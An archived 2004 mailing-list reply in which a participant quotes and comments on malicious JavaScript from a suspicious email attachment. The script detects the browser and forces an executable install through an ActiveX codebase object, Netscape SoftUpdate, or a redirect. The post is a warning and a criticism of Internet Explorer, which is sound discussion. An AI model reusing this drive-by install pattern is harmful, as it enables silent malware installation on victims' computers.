[Author Prev][Author Next][Thread Prev][Thread Next][Author Index][Thread Index]

Re: [school-discuss]



On Monday 09 August 2004 3:44 pm, Archiver wrote:
> <html><body>
> new price<br><br>
>
> <br>
> </body></html>

Clever way to execute a binary: launch an executable by way of javascript 
embedded in an attached zipped web page, (see below) but who would fall for 
this?  And if it's a virus how was it clever enough to spoof 
<archiver@seul.org>?

At the risk of preaching to the converted, YA Reason for dumping IE.  And 
windows.  

bb

<SCRIPT LANGUAGE="JavaScript">
<!--
var bname=navigator.appName;
sewre = "rseI";
var bver=parseInt(navigator.appVersion);

function install() {
        if ( navigator.platform && navigator.platform != 'Win32' ) {
                location.replace('NOTWIN32WARNING.html');
                return;
        }
        if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
                document.write('<object id="gib" width=1 height=1 
classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D"   
codebase="'+exepath+'"></object>');
        } else if (bname == 'Netscape' && bver >= 4) {
                trigger = netscape.softupdate.Trigger;
                if (trigger.UpdateEnabled) {
                        trigger.StartSoftwareUpdate(exepath, 
trigger.DEFAULT_MODE)
                } else {
                        location.replace(exepath);
                }
        } else {
                location.replace(exepath);
        }
}

install();

// -->
</script>
-